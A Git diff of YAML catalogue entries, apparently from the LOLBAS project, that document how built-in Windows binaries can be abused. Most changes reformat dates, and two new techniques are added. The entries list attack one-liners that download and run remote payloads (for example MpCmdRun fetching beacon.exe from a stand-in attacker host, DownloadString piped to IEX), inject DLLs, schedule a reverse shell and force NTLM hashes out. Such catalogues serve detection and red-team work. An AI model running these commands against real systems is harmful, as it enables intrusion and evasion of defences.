|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: HH.exe http://some.url/script.ps1
|
||||
Description: Open the target PowerShell script with HTML Help.
|
||||
|
22
yml/OSBinaries/IMEWDBLD.yml
Normal file
22
yml/OSBinaries/IMEWDBLD.yml
Normal file
@ -0,0 +1,22 @@
|
||||
---
|
||||
Name: IMEWDBLD.exe
|
||||
Description: Microsoft IME Open Extended Dictionary Module
|
||||
Author: 'Wade Hickey'
|
||||
Created: '2020-03-05'
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
|
||||
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/notwhickey/status/1367493406835040265
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
@ -2,7 +2,7 @@
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ie4uinit.exe -BaseSettings
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ieexec.exe
|
||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ilasm.exe
|
||||
Description: used for compile c# code into dll or exe.
|
||||
Author: Hai vaknin (lux)
|
||||
Created: 17/03/2020
|
||||
Created: 2020-03-17
|
||||
Commands:
|
||||
- Command: ilasm.exe C:\public\test.txt /exe
|
||||
Description: Binary file used by .NET to compile c# code to .exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Infdefaultinstall.exe
|
||||
Description: Binary used to perform installation based on content inside inf files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Installutil.exe
|
||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Jsc.exe
|
||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-05-31'
|
||||
Created: 2019-05-31
|
||||
Commands:
|
||||
- Command: jsc.exe scriptfile.js
|
||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Makecab.exe
|
||||
Description: Binary to package existing files into a cabinet (.cab) file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mavinject.exe
|
||||
Description: Used by App-v in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||
Description: Inject evil.dll into a process with PID 3110.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Microsoft.Workflow.Compiler.exe
|
||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||
Author: 'Conor Richard'
|
||||
Created: '2018-10-22'
|
||||
Created: 2018-10-22
|
||||
Commands:
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mmc.exe
|
||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: MpCmdRun.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '09/03/2020'
|
||||
Created: 2020-03-20
|
||||
Commands:
|
||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msbuild.exe
|
||||
Description: Used to compile and execute code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
@ -20,6 +20,14 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msbuild.exe project.proj
|
||||
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
|
||||
Usecase: Execute project file that contains XslTransformation tag parameters
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
@ -27,8 +35,9 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
Resources:
|
||||
@ -36,9 +45,12 @@ Resources:
|
||||
- Link: https://github.com/Cn33liz/MSBuildShell
|
||||
- Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Cn33liz
|
||||
Handle: '@Cneelis'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
@ -2,7 +2,7 @@
|
||||
Name: Msconfig.exe
|
||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Msconfig.exe -5
|
||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msdt.exe
|
||||
Description: Microsoft diagnostics tool
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mshta.exe
|
||||
Description: Used by Windows to execute html applications. (.hta)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: mshta.exe evilfile.hta
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msiexec.exe
|
||||
Description: Used by Windows to execute msi files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msiexec /quiet /i cmd.msi
|
||||
Description: Installs the target .MSI file silently.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Netsh.exe
|
||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-12-24'
|
||||
Created: 2019-12-24
|
||||
Commands:
|
||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Odbcconf.exe
|
||||
Description: Used in Windows for managing ODBC connections
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: odbcconf -f file.rsp
|
||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcalua.exe
|
||||
Description: Program Compatibility Assistant
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: pcalua.exe -a calc.exe
|
||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcwrun.exe
|
||||
Description: Program Compatibility Wizard
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pktmon.exe
|
||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||
Author: 'Derek Johnson'
|
||||
Created: '2020-08-12'
|
||||
Created: 2020-08-12
|
||||
Commands:
|
||||
- Command: pktmon.exe start --etw
|
||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Presentationhost.exe
|
||||
Description: File is used for executing Browser applications
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||
Description: Executes the target XAML Browser Application (XBAP) file
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Print.exe
|
||||
Description: Used by Windows to send files to the printer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Psr.exe
|
||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||
Author: Leon Rodenko
|
||||
Created: '2020-06-27'
|
||||
Created: 2020-06-27
|
||||
Commands:
|
||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rasautou.exe
|
||||
Description: Windows Remote Access Dialer
|
||||
Author: 'Tony Lambert'
|
||||
Created: '2020-01-10'
|
||||
Created: 2020-01-10
|
||||
Commands:
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Reg.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regasm.exe
|
||||
Description: Part of .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regedit.exe
|
||||
Description: Used by Windows to manipulate registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Description: Export the target Registry key to the specified .REG file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regini.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2020-07-03'
|
||||
Created: 2020-07-03
|
||||
Commands:
|
||||
- Command: regini.exe newfile.txt:hidden.ini
|
||||
Description: Write registry keys from data inside the Alternate data stream.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Register-cimprovider.exe
|
||||
Description: Used to register new wmi providers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||
Description: Load the target .DLL.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvcs.exe
|
||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvr32.exe
|
||||
Description: Used by Windows to register dlls
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Replace.exe
|
||||
Description: Used to replace file with another file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Description: Copy file.cab to destination
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rpcping.exe
|
||||
Description: Used to verify rpc connection
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rundll32.exe
|
||||
Description: Used by Windows to execute dll files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Runonce.exe /AlternateShellStartup
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||
Description: Execute the PowerShell script named test.txt
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Sc.exe
|
||||
Description: Used by Windows to manage services
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||
Description: Creates a new service and executes the file stored in the ADS.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Schtasks.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||
Description: Create a recurring task to execute every minute.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Scriptrunner.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Scriptrunner.exe -appvscript calc.exe
|
||||
Description: Executes calc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: SyncAppvPublishingServer.exe
|
||||
Description: Used by App-v to get App-v server lists
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
Description: Example command on how inject Powershell code into the process
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ttdinject.exe
|
||||
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
|
||||
Author: 'Maxime Nadeau'
|
||||
Created: '2020-05-12'
|
||||
Created: 2020-05-12
|
||||
Commands:
|
||||
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
|
||||
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Tttracer.exe
|
||||
Description: Used by Windows 1809 and newer to Debug Time Travel
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-11-5'
|
||||
Created: 2019-11-05
|
||||
Commands:
|
||||
- Command: tttracer.exe C:\windows\system32\calc.exe
|
||||
Description: Execute calc using tttracer.exe. Requires administrator privileges
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: vbc.exe
|
||||
Description: Binary file used for compile vbs code
|
||||
Author: Lior Adar
|
||||
Created: 27/02/2020
|
||||
Created: 2020-02-27
|
||||
Commands:
|
||||
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
|
||||
Description: Binary file used by .NET to compile vb code to .exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Verclsid.exe
|
||||
Description:
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: verclsid.exe /S /C {CLSID}
|
||||
Description: Used to verify a COM object before it is instantiated by Windows Explorer
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wab.exe
|
||||
Description: Windows address book manager
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wab.exe
|
||||
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wmic.exe
|
||||
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wscript.exe
|
||||
Description: Used by Windows to execute scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wscript c:\ads\file.txt:script.vbs
|
||||
Description: Execute script stored in an alternate data stream
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user